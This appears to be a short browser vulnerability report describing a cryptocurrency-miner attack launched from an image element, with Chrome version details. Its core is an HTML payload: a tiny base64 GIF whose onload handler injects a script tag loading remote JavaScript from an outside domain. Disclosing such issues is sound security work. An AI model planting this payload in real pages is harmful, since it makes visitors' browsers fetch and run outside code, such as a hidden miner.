VULNERABILITY DETAILS
I just noticed that an image or a character can be used to start the fxp. bitcoin miner attack.
This is that bit of code through which I found that out:
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAUEBAAAACwAAAAAAQABAAACAkQBADs=" onload="$(document).append('<script src='http://h777a.ml/777/qp.js/' crossorigin='anonymous'></script>')" />
I won't put any more unnecessary examples nor will I attach any since this one shows it perfectly.

VERSION
Chrome Version: [63.0.3239.132] + [stable]
Operating System: Windows 10 Pro, 1709 Version, and 16299.248 OS Build